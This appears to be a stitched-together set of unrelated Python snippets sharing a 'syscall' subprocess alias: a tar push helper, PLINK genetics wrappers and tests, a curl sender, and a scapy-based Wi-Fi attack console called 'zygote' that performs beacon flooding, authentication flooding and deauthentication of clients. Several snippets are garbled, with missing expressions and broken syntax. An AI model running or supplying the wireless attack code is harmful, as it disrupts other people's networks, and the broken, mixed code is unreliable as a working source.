def local_push(self, cmdl): """ Pushes file to a local directory using tar. This process is daemonized. """ from os import makedirs from os.path import join, exists, dirname from getpass import getuser from datetime import datetime from subprocess import call as syscall, STDOUT from sys import executable from .. import local_push_dir try: args = _get_local_push_parser().parse_args(cmdl.split()) except SystemExit: return None if args.list: for u in _walk_files(args): print u return if not exists(local_push_dir): makedirs(local_push_dir) filename = join(local_push_dir, getuser() + str(' ', '_')) # gets comment file. comment_filename = _getcomment(self, filename + ".comment") if comment_filename is None: return commands = ["nohup", executable, join(dirname(__file__), ""), '--tarfile', filename, '--commentfile', comment_filename ] commands.extend(cmdl.split()) syscall(commands, stdout=open(filename + ".log", 'w'), stderr=STDOUT) print "Working in background. " print "See", (filename + ".log"), "for files being pushed, or you use --list option." print "You can log out at this point."
def plinkify(ds, min=None, max=None): vcf = utils.new_temp_file(prefix="plink", suffix="vcf") plinkpath = utils.new_temp_file(prefix="plink") hl.export_vcf(ds, vcf) threshold_string = "{} {}".format("--min {}".format(min) if min else "", "--max {}".format(max) if max else "") plink_command = "plink --double-id --allow-extra-chr --vcf {} --genome full --out {} {}" \ .format(utils.uri_path(vcf), utils.uri_path(plinkpath), threshold_string) result_file = utils.uri_path(plinkpath + ".genome") syscall(plink_command, shell=True, stdout=DEVNULL, stderr=DEVNULL) ### format of .genome file is: # _, fid1, iid1, fid2, iid2, rt, ez, z0, z1, z2, pihat, phe, # dst, ppc, ratio, ibs0, ibs1, ibs2, homhom, hethet (+ separated) ### format of ibd is: # i (iid1), j (iid2), ibd: {Z0, Z1, Z2, PI_HAT}, ibs0, ibs1, ibs2 results = {} with open(result_file) as f: f.readline() for line in f: row = line.strip().split() results[(row[1], row[3])] = (list(map(float, row[6:10])), list(map(int, row[14:17]))) return results
def cmd(command): path = '' paramlist = '' try: if 'params' in command: for key in command['params']: paramlist += ' ' + str(key) if command['params'][key]: paramlist += ' ' + str(command['params'][key]) path = command['path'] + paramlist else: path = command['path'] syscall(path) debug('SYSTEM CALL: ' + path) except Exception as e: debug("System call: " + path + paramlist + " failed!\n\t" + type(e).__name__ + ": " + e.message)
def sendCurl(payload, URL): global HEADERS global USER global PWD AUTH=USER+":"+PWD curl=['curl', '--digest', '-u', AUTH, '-d', payload, '--header', HEADERA , '--header', HEADERB , URL] #log.debug('%s called from %s with %s' %(getFunctionName(), getCallingModuleName(), getArguments(inspect.currentframe()))) return syscall(curl)
def test_grm(self): tolerance = 0.001 def load_id_file(path): ids = [] with hl.hadoop_open(path) as f: for l in f: r = l.strip().split('\t') self.assertEqual(len(r), 2) ids.append(r[1]) return ids def load_rel(ns, path): rel = np.zeros((ns, ns)) with hl.hadoop_open(path) as f: for i, l in enumerate(f): for j, n in enumerate(map(float, l.strip().split('\t'))): rel[i, j] = n self.assertEqual(j, i) self.assertEqual(i, ns - 1) return rel def load_grm(ns, nv, path): m = np.zeros((ns, ns)) with utils.hadoop_open(path) as f: i = 0 for l in f: row = l.strip().split('\t') self.assertEqual(int(row[2]), nv) m[int(row[0]) - 1, int(row[1]) - 1] = float(row[3]) i += 1 self.assertEqual(i, ns * (ns + 1) / 2) return m def load_bin(ns, path): m = np.zeros((ns, ns)) with utils.hadoop_open(path, 'rb') as f: for i in range(ns): for j in range(i + 1): b = self.assertEqual(len(b), 4) m[i, j] = unpack('<f', bytearray(b))[0] left = self.assertEqual(len(left), 0) return m b_file = utils.new_temp_file(prefix="plink") rel_file = utils.new_temp_file(prefix="test", suffix="rel") rel_id_file = utils.new_temp_file(prefix="test", suffix="") grm_file = utils.new_temp_file(prefix="test", suffix="grm") grm_bin_file = utils.new_temp_file(prefix="test", suffix="grm.bin") grm_nbin_file = utils.new_temp_file(prefix="test", suffix="grm.N.bin") dataset = self.get_dataset() n_samples = dataset.count_cols() dataset = dataset.annotate_rows(AC=agg.sum(dataset.GT.n_alt_alleles()), n_called=agg.count_where(hl.is_defined(dataset.GT))) dataset = dataset.filter_rows((dataset.AC > 0) & (dataset.AC < 2 * dataset.n_called)) dataset = dataset.filter_rows(dataset.n_called == n_samples).persist() hl.export_plink(dataset, b_file, id=dataset.s) sample_ids = [row.s for row in dataset.cols().select('s').collect()] n_variants = dataset.count_rows() self.assertGreater(n_variants, 0) grm = hl.genetic_relatedness_matrix(dataset) grm.export_id_file(rel_id_file) ############ ### rel p_file = utils.new_temp_file(prefix="plink") syscall('''plink --bfile {} --make-rel --out {}''' .format(utils.uri_path(b_file), utils.uri_path(p_file)), shell=True, stdout=DEVNULL, stderr=DEVNULL) self.assertEqual(load_id_file(p_file + ""), sample_ids) grm.export_rel(rel_file) self.assertEqual(load_id_file(rel_id_file), sample_ids) self.assertTrue(np.allclose(load_rel(n_samples, p_file + ".rel"), load_rel(n_samples, rel_file), atol=tolerance)) ############ ### gcta-grm p_file = utils.new_temp_file(prefix="plink") syscall('''plink --bfile {} --make-grm-gz --out {}''' .format(utils.uri_path(b_file), utils.uri_path(p_file)), shell=True, stdout=DEVNULL, stderr=DEVNULL) self.assertEqual(load_id_file(p_file + ""), sample_ids) grm.export_gcta_grm(grm_file) self.assertTrue(np.allclose(load_grm(n_samples, n_variants, p_file + ".grm.gz"), load_grm(n_samples, n_variants, grm_file), atol=tolerance)) ############ ### gcta-grm-bin p_file = utils.new_temp_file(prefix="plink") syscall('''plink --bfile {} --make-grm-bin --out {}''' .format(utils.uri_path(b_file), utils.uri_path(p_file)), shell=True, stdout=DEVNULL, stderr=DEVNULL) self.assertEqual(load_id_file(p_file + ""), sample_ids) grm.export_gcta_grm_bin(grm_bin_file, grm_nbin_file) self.assertTrue(np.allclose(load_bin(n_samples, p_file + ".grm.bin"), load_bin(n_samples, grm_bin_file), atol=tolerance)) self.assertTrue(np.allclose(load_bin(n_samples, p_file + ".grm.N.bin"), load_bin(n_samples, grm_nbin_file), atol=tolerance))
def startframe(): while True: try: global deauthencations global network_essids global deauthencation_frame global client global IEEE802AP global mac_addr prompt = input("\033[94mzygote>\033[95m ").lower() mvi = prompt.split(" ")[0] if mvi == "help": print(frame.options) startframe() if mvi == "clear": syscall("clear") startframe() if mvi == "banner": syscall("clear") print(frame.banner) if mvi == "exit": exit() if mvi == "beaconflood": annoyance_time = float(prompt.split(" ")[1]) time_setter = time.time() + annoyance_time print("Sending beacon frames...") def task(): try: while time.time() < time_setter: randstr1 = random.randint(0, 255) randstr2 = random.randint(0, 255) randstr3 = random.randint(0, 255) randstr4 = random.randint(0, 255) randstr5 = random.randint(0, 255) randstr6 = random.randint(0, 255) def starting_task(): while True: rand_name = random._urandom(10) mac = str( "%02x:%02x:%02x:%02x:%02x:%02x\n" % (randstr1, randstr2, randstr3, randstr4, randstr5, randstr6)) dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=mac, addr3=mac) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=str(rand_name)) frame = (RadioTap() / dot11 / beacon / essid) sendp(frame, verbose=False) multiprocessing.Process( target=starting_task).start() threading.Thread(target=starting_task).start() except KeyboardInterrupt: startframe() if mvi == "authentication": try: IEEE802AP = prompt.split(" ")[1] interface = prompt.split(" ")[2] print("Sending authentication clients...") while True: randstr1 = random.randint(0, 255) randstr2 = random.randint(0, 255) randstr3 = random.randint(0, 255) randstr4 = random.randint(0, 255) randstr5 = random.randint(0, 255) randstr6 = random.randint(0, 255) mac_addr = str("%02x:%02x:%02x:%02x:%02x:%02x\n" % (randstr1, randstr2, randstr3, randstr4, randstr5, randstr6)) authentication_frame = RadioTap() / Dot11( addr1=IEEE802AP, addr2=mac_addr, addr3=IEEE802AP) / Dot11Auth() sendp(authentication_frame, iface=interface, verbose=False) except KeyboardInterrupt: print("\nStopped") startframe() if mvi == "deauth": try: IEEE802AP = prompt.split(" ")[1] interface = prompt.split(" ")[2] client = prompt.split(" ")[3] try: print("Deauthencation frames sending....") def framesend(interface, IEEE802AP, client, authentication_frame): while True: if client == "0": client = "FF:FF:FF:FF:FF:FF" sendp(deauthencation_frame, iface=interface, verbose=False) else: sendp(deauthencation_frame, iface=interface, verbose=False) while True: t = threading.Thread(target=framesend, args=(interface, IEEE802AP, client, deauthencation_frame)) t.setDaemon(True) t.start() except KeyboardInterrupt: t.setDaemon(False) print("\nStopped") startframe() except KeyboardInterrupt: print("\nStopped!") startframe() if mvi == "networklist": interface = prompt.split(" ")[1] capture_count = 0 ssids = set() def pkt_handler(pkt): if pkt.haslayer(Dot11Beacon): temp = pkt while temp: temp = temp.getlayer(Dot11Elt) if temp and temp.ID == 0 and ( not in ssids): ssids.add( print(len(ssids), pkt.addr3, break temp = temp.payload sniff(iface=interface, prn=pkt_handler) except KeyboardInterrupt: print("Stopped\n") startframe()
from random import _urandom as byte_object from subprocess import call as syscall import multiprocessing deauthencations = 0 network_essids = [] client = "FF:FF:FF:FF:FF:FF" IEEE802AP = "FF:FF:FF:FF:FF:FF" interface = "none" deauthencation_frame = RadioTap() / Dot11( addr1=client, addr2=IEEE802AP, addr3=IEEE802AP) / Dot11Deauth() if not os.geteuid() == 0: print("! this script mus be ran as root smh") exit() syscall("clear", shell=True) print(frame.banner) def startframe(): while True: try: global deauthencations global network_essids global deauthencation_frame global client global IEEE802AP global mac_addr prompt = input("\033[94mzygote>\033[95m ").lower() mvi = prompt.split(" ")[0] if mvi == "help":